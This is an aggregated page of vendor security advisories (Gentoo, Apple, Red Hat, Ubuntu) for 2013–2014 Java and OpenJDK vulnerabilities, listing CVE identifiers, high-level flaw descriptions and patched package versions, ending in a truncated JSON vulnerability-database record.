CVE-2013-2419 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419 [ 141 ] CVE-2013-2420 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420 [ 142 ] CVE-2013-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421 [ 143 ] CVE-2013-2422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422 [ 144 ] CVE-2013-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423 [ 145 ] CVE-2013-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424 [ 146 ] CVE-2013-2426 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426 [ 147 ] CVE-2013-2429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429 [ 148 ] CVE-2013-2430 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430 [ 149 ] CVE-2013-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431 [ 150 ] CVE-2013-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436 [ 151 ] CVE-2013-2443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443 [ 152 ] CVE-2013-2444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444 [ 153 ] CVE-2013-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445 [ 154 ] CVE-2013-2446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446 [ 155 ] CVE-2013-2447 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447 [ 156 ] CVE-2013-2448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448 [ 157 ] CVE-2013-2449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449 [ 158 ] CVE-2013-2450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450 [ 159 ] CVE-2013-2451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451 [ 160 ] CVE-2013-2452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452 [ 161 ] CVE-2013-2453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453 [ 162 ] CVE-2013-2454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454 [ 163 ] CVE-2013-2455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455 [ 164 ] CVE-2013-2456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456 [ 165 ] CVE-2013-2457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457 [ 166 ] CVE-2013-2458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458 [ 167 ] CVE-2013-2459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459 [ 168 ] CVE-2013-2460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460 [ 169 ] CVE-2013-2461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461 [ 170 ] CVE-2013-2463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463 [ 171 ] CVE-2013-2465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465 [ 172 ] CVE-2013-2469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469 [ 173 ] CVE-2013-2470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470 [ 174 ] CVE-2013-2471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471 [ 175 ] CVE-2013-2472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472 [ 176 ] CVE-2013-2473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473 [ 177 ] CVE-2013-3829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829 [ 178 ] CVE-2013-4002 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4002 [ 179 ] CVE-2013-5772 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772 [ 180 ] CVE-2013-5774 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774 [ 181 ] CVE-2013-5778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778 [ 182 ] CVE-2013-5780 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780 [ 183 ] CVE-2013-5782 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782 [ 184 ] CVE-2013-5783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783 [ 185 ] CVE-2013-5784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784 [ 186 ] CVE-2013-5790 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790 [ 187 ] CVE-2013-5797 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797 [ 188 ] CVE-2013-5800 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800 [ 189 ] CVE-2013-5802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802 [ 190 ] CVE-2013-5803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803 [ 191 ] CVE-2013-5804 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804 [ 192 ] CVE-2013-5805 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805 [ 193 ] CVE-2013-5806 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806 [ 194 ] CVE-2013-5809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809 [ 195 ] CVE-2013-5814 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814 [ 196 ] CVE-2013-5817 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817 [ 197 ] CVE-2013-5820 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820 [ 198 ] CVE-2013-5823 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823 [ 199 ] CVE-2013-5825 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825 [ 200 ] CVE-2013-5829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829 [ 201 ] CVE-2013-5830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830 [ 202 ] CVE-2013-5840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840 [ 203 ] CVE-2013-5842 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842 [ 204 ] CVE-2013-5849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849 [ 205 ] CVE-2013-5850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850 [ 206 ] CVE-2013-5851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851 [ 207 ] CVE-2013-6629 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6629 [ 208 ] CVE-2013-6954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6954 [ 209 ] CVE-2014-0429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429 [ 210 ] CVE-2014-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446 [ 211 ] CVE-2014-0451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451 [ 212 ] CVE-2014-0452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452 [ 213 ] CVE-2014-0453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453 [ 214 ] CVE-2014-0456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456 [ 215 ] CVE-2014-0457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457 [ 216 ] CVE-2014-0458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458 [ 217 ] CVE-2014-0459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459 [ 218 ] CVE-2014-0460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460 [ 219 ] CVE-2014-0461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461 [ 220 ] CVE-2014-1876 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1876 [ 221 ] CVE-2014-2397 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397 [ 222 ] CVE-2014-2398 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398 [ 223 ] CVE-2014-2403 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403 [ 224 ] CVE-2014-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412 [ 225 ] CVE-2014-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414 [ 226 ] CVE-2014-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421 [ 227 ] CVE-2014-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423 [ 228 ] CVE-2014-2427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201406-32.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
APPLE-SA-2013-10-15-1 Java for OS X 2013-005 and Mac OS X v10.6 Update 17
Java for OS X 2013-005 and Mac OS X v10.6 Update 17 is now available and addresses the following:
Java Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 or later, OS X Lion Server v10.7 or later, OS X Mountain Lion 10.8 or later Impact: Multiple vulnerabilities in Java 1.6.0_51 Description: 8011782 Multiple vulnerabilities existed in Java 1.6.0_51, the most serious of which may allow an untrusted Java applet to execute arbitrary code outside the Java sandbox. These issues were addressed by updating to Java version 1.6.0_65. Further information is available via the Java website at ht tp://www.oracle.com/technetwork/java/javase/releasenotes-136954.html CVE-ID CVE-2013-3829 CVE-2013-4002 CVE-2013-5772 CVE-2013-5774 CVE-2013-5776 CVE-2013-5778 CVE-2013-5780 CVE-2013-5782 CVE-2013-5783 CVE-2013-5784 CVE-2013-5787 CVE-2013-5789 CVE-2013-5790 CVE-2013-5797 CVE-2013-5801 CVE-2013-5802 CVE-2013-5803 CVE-2013-5804 CVE-2013-5809 CVE-2013-5812 CVE-2013-5814 CVE-2013-5817 CVE-2013-5818 CVE-2013-5819 CVE-2013-5820 CVE-2013-5823 CVE-2013-5824 CVE-2013-5825 CVE-2013-5829 CVE-2013-5830 CVE-2013-5831 CVE-2013-5832 CVE-2013-5840 CVE-2013-5842 CVE-2013-5843 CVE-2013-5848 CVE-2013-5849 CVE-2013-5850
Java for OS X 2013-005 and Mac OS X v10.6 Update 17 may be obtained from the Software Update pane in System Preferences, Mac App Store, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
For Mac OS X v10.6 systems The download file is named: JavaForMacOSX10.6update17.dmg Its SHA-1 digest is: 5dfe7eaebf9726352c97964da61d57fa28246c08
For OS X Lion and Mountain Lion systems The download file is named: JavaForOSX2013-005.dmg Its SHA-1 digest is: ce78f9a916b91ec408c933bd0bde5973ca8a2dc4
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJSXYc6AAoJEPefwLHPlZEwD8EP/3aN1h4wIM/BjidF3ZY+PXf3 Lzgtb8yAxh03A+J3NJCd3BKmjINXIo9Wwt9aUTktEz4UefvpF+rIsgKSinotvQt0 TmtsYPItFgs83Lj2IFBpCLurM+O0fUhje+mvVzR/KA7kHvrtXYRC5w2plWh32Smm D4Ejh8odeR0IU3OdWV5MJpcRoRpRySX16JOEJc76SIE0+sbOLHZ90rmzyPMB0S2u jZRq8qY3DJS9C5De97gh8F/V76fV8Aiq6RwGPs9m+tJUCJe6XLEy8Wq/G3jlKXyr +KrradRl9Bz5oTUnVDlN9odoOGZ/J4nq4xs0RyN08uETKcw6315+7UTP3B+hD8IM 1YyWeceCd8oHtWlR/02spwaku5ctxiUZpqXQ8DxDH3e8dONBfndfmKGUnywQSFd8 vCgZR0SQgSbhtD/UnNGW9VgJsxKgO4gi17aVD/B9LYmMztsSB+wPkg96uTR6J7yh +ogJqYeOGsMvvQd8XY++ig1bhEsfzzauEWnq3G4WG8E+Fep+5RHZewxnhzakapqW 2z7byXHNXtIP2cxL//DG/x4ed+gAWzKxZyPDPSrltw162mkJk/6mTedtpead4LH8 Ooi4Cf1HMbC9gdRBdtGNWo7EN9kr9rpajuRWjqxT5uTLAgJusKk5UnSO2KJtromy Los4PbyC//yRidZKynqx =I3n5 -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: java-1.7.0-openjdk security update Advisory ID: RHSA-2013:1447-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-1447.html Issue date: 2013-10-21 CVE Names: CVE-2013-3829 CVE-2013-4002 CVE-2013-5772 CVE-2013-5774 CVE-2013-5778 CVE-2013-5780 CVE-2013-5782 CVE-2013-5783 CVE-2013-5784 CVE-2013-5790 CVE-2013-5797 CVE-2013-5800 CVE-2013-5802 CVE-2013-5803 CVE-2013-5804 CVE-2013-5809 CVE-2013-5814 CVE-2013-5817 CVE-2013-5820 CVE-2013-5823 CVE-2013-5825 CVE-2013-5829 CVE-2013-5830 CVE-2013-5838 CVE-2013-5840 CVE-2013-5842 CVE-2013-5849 CVE-2013-5850 CVE-2013-5851 =====================================================================
- Summary:
Updated java-1.7.0-openjdk packages that fix various security issues are now available for Red Hat Enterprise Linux 5.
The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux (v. 5 server) - i386, x86_64 Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
- Description:
These packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Software Development Kit.
Multiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. (CVE-2013-5782)
The class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. (CVE-2013-5830)
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850, CVE-2013-5838)
Multiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions. (CVE-2013-5809)
The FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. (CVE-2013-5802)
Multiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840, CVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5851, CVE-2013-5800, CVE-2013-5849, CVE-2013-5790, CVE-2013-5784)
It was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. (CVE-2013-5778)
Multiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks. (CVE-2013-5804, CVE-2013-5797)
Various OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. (CVE-2013-5780)
The Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. (CVE-2013-5772)
The Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. (CVE-2013-5803)
All users of java-1.7.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously-released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Bugs fixed (http://bugzilla.redhat.com/):
1018713 - CVE-2013-5803 OpenJDK: insufficient checks of KDC replies (JGSS, 8014341) 1018717 - CVE-2013-5772 OpenJDK: insufficient html escaping in jhat (jhat, 8011081) 1018720 - CVE-2013-5797 OpenJDK: insufficient escaping of window title string (Javadoc, 8016675) 1018727 - CVE-2013-5784 OpenJDK: insufficient InterfaceImplementor security checks (Scripting, 8017299) 1018736 - CVE-2013-5790 OpenJDK: insufficient security checks (Beans, 8012071) 1018750 - CVE-2013-5849 OpenJDK: insufficient DataFlavor security checks (AWT, 8012277) 1018755 - CVE-2013-5800 OpenJDK: default keytab path information leak (JGSS, 8022931) 1018785 - CVE-2013-5780 OpenJDK: key data leak via toString() methods (Libraries, 8011071) 1018831 - CVE-2013-5840 OpenJDK: getDeclaringClass() information leak (Libraries, 8014349) 1018972 - CVE-2013-5820 OpenJDK: insufficient security checks (JAXWS, 8017505) 1018977 - CVE-2013-5851 OpenJDK: XML stream factory finder information leak (JAXP, 8013502) 1018984 - CVE-2013-5778 OpenJDK: image conversion out of bounds read (2D, 8014102) 1019108 - CVE-2013-5782 OpenJDK: Incorrect awt_getPixelByte/awt_getPixelShort/awt_setPixelByte/awt_setPixelShort image raster checks (2D, 8014093) 1019110 - CVE-2013-5830 OpenJDK: checkPackageAccess missing security check (Libraries, 8017291) 1019113 - CVE-2013-5809 OpenJDK: JPEGImageReader and JPEGImageWriter missing band size checks (2D, 8013510) 1019115 - CVE-2013-5829 OpenJDK: Java2d Disposer security bypass (2D, 8017287) 1019117 - CVE-2013-5814 OpenJDK: RMIConnection stub missing permission check (CORBA, 8011157) 1019118 - CVE-2013-5817 OpenJDK: VersionHelper12 does not honor modifyThreadGroup restriction (JNDI, 8013739) 1019123 - CVE-2013-5842 OpenJDK: ObjectInputStream/ObjectOutputStream missing checks (Libraries, 8014987) 1019127 - CVE-2013-5850 OpenJDK: Missing CORBA security checks (Libraries, 8017196) 1019130 - CVE-2013-5802 OpenJDK: javax.xml.transform.TransformerFactory does not properly honor XMLConstants.FEATURE_SECURE_PROCESSING (JAXP, 8012425) 1019131 - CVE-2013-5804 OpenJDK: javac does not ignore certain ignorable characters (Javadoc, 8016653) 1019133 - CVE-2013-3829 OpenJDK: java.util.TimeZone does not restrict setting of default time zone (Libraries, 8001029) 1019137 - CVE-2013-5783 OpenJDK: JTable not properly performing certain access checks (Swing, 8013744) 1019139 - CVE-2013-5825 OpenJDK: XML parsing Denial of Service (JAXP, 8014530) 1019145 - CVE-2013-5823 OpenJDK: com.sun.org.apache.xml.internal.security.utils.UnsyncByteArrayOutputStream Denial of Service (Security, 8021290) 1019147 - CVE-2013-5774 OpenJDK: Inet6Address class IPv6 address processing errors (Libraries, 8015743) 1019176 - CVE-2013-4002 OpenJDK: XML parsing Denial of Service (JAXP, 8017298) 1019300 - CVE-2013-5838 OpenJDK: Vulnerability in Libraries component (Libraries, 7023639)
- Package List:
Red Hat Enterprise Linux Desktop (v. 5 client):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10.src.rpm
i386: java-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10.i386.rpm java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.1.el5_10.i386.rpm java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.1.el5_10.i386.rpm java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.1.el5_10.i386.rpm java-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.1.el5_10.i386.rpm java-1.7.0-openjdk-src-1.7.0.45-2.4.3.1.el5_10.i386.rpm
x86_64: java-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm java-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10.src.rpm
i386: java-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10.i386.rpm java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.1.el5_10.i386.rpm java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.1.el5_10.i386.rpm java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.1.el5_10.i386.rpm java-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.1.el5_10.i386.rpm java-1.7.0-openjdk-src-1.7.0.45-2.4.3.1.el5_10.i386.rpm
x86_64: java-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm java-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.45-2.4.3.1.el5_10.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2013-3829.html https://www.redhat.com/security/data/cve/CVE-2013-4002.html https://www.redhat.com/security/data/cve/CVE-2013-5772.html https://www.redhat.com/security/data/cve/CVE-2013-5774.html https://www.redhat.com/security/data/cve/CVE-2013-5778.html https://www.redhat.com/security/data/cve/CVE-2013-5780.html https://www.redhat.com/security/data/cve/CVE-2013-5782.html https://www.redhat.com/security/data/cve/CVE-2013-5783.html https://www.redhat.com/security/data/cve/CVE-2013-5784.html https://www.redhat.com/security/data/cve/CVE-2013-5790.html https://www.redhat.com/security/data/cve/CVE-2013-5797.html https://www.redhat.com/security/data/cve/CVE-2013-5800.html https://www.redhat.com/security/data/cve/CVE-2013-5802.html https://www.redhat.com/security/data/cve/CVE-2013-5803.html https://www.redhat.com/security/data/cve/CVE-2013-5804.html https://www.redhat.com/security/data/cve/CVE-2013-5809.html https://www.redhat.com/security/data/cve/CVE-2013-5814.html https://www.redhat.com/security/data/cve/CVE-2013-5817.html https://www.redhat.com/security/data/cve/CVE-2013-5820.html https://www.redhat.com/security/data/cve/CVE-2013-5823.html https://www.redhat.com/security/data/cve/CVE-2013-5825.html https://www.redhat.com/security/data/cve/CVE-2013-5829.html https://www.redhat.com/security/data/cve/CVE-2013-5830.html https://www.redhat.com/security/data/cve/CVE-2013-5838.html https://www.redhat.com/security/data/cve/CVE-2013-5840.html https://www.redhat.com/security/data/cve/CVE-2013-5842.html https://www.redhat.com/security/data/cve/CVE-2013-5849.html https://www.redhat.com/security/data/cve/CVE-2013-5850.html https://www.redhat.com/security/data/cve/CVE-2013-5851.html https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFSZWg6XlSAg2UNWIIRAtrcAJ9Pr8HUGP6KoZuAOmHGz4SotHk0CwCgmOVZ 5FtHw7EpRVvpS7dBLzZEHE0= =QE5j -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ============================================================================ Ubuntu Security Notice USN-2033-1 November 21, 2013
openjdk-6 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenJDK 6.
Software Description: - openjdk-6: Open Source Java implementation
Details:
Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-3829, CVE-2013-5783, CVE-2013-5804)
Several vulnerabilities were discovered in the OpenJDK JRE related to availability. An attacker could exploit these to cause a denial of service. (CVE-2013-4002, CVE-2013-5803, CVE-2013-5823, CVE-2013-5825)
Several vulnerabilities were discovered in the OpenJDK JRE related to data integrity. (CVE-2013-5772, CVE-2013-5774, CVE-2013-5784, CVE-2013-5797, CVE-2013-5820)
Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-5778, CVE-2013-5780, CVE-2013-5790, CVE-2013-5840, CVE-2013-5849, CVE-2013-5851)
Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity and availability. An attacker could exploit these to cause a denial of service or expose sensitive data over the network. (CVE-2013-5782, CVE-2013-5802, CVE-2013-5809, CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5830, CVE-2013-5842, CVE-2013-5850)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.04 LTS: icedtea-6-jre-cacao 6b27-1.12.6-1ubuntu0.12.04.4 icedtea-6-jre-jamvm 6b27-1.12.6-1ubuntu0.12.04.4 openjdk-6-jre 6b27-1.12.6-1ubuntu0.12.04.4 openjdk-6-jre-headless 6b27-1.12.6-1ubuntu0.12.04.4 openjdk-6-jre-lib 6b27-1.12.6-1ubuntu0.12.04.4 openjdk-6-jre-zero 6b27-1.12.6-1ubuntu0.12.04.4
Ubuntu 10.04 LTS: icedtea-6-jre-cacao 6b27-1.12.6-1ubuntu0.10.04.4 openjdk-6-jre 6b27-1.12.6-1ubuntu0.10.04.4 openjdk-6-jre-headless 6b27-1.12.6-1ubuntu0.10.04.4 openjdk-6-jre-lib 6b27-1.12.6-1ubuntu0.10.04.4 openjdk-6-jre-zero 6b27-1.12.6-1ubuntu0.10.04.4
This update uses a new upstream release, which includes additional bug fixes
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201310-0613", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jrockit", "scope": "lte", "trust": 1.8, "vendor": "oracle", "version": "r27.7.6" }, { "model": "jrockit", "scope": "lte", "trust": 1.8, "vendor": "oracle", "version": "r28.2.8" }, { "model": "ucosminexus client", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus developer professional version", "scope": "eq", "trust": 1.5, "vendor": 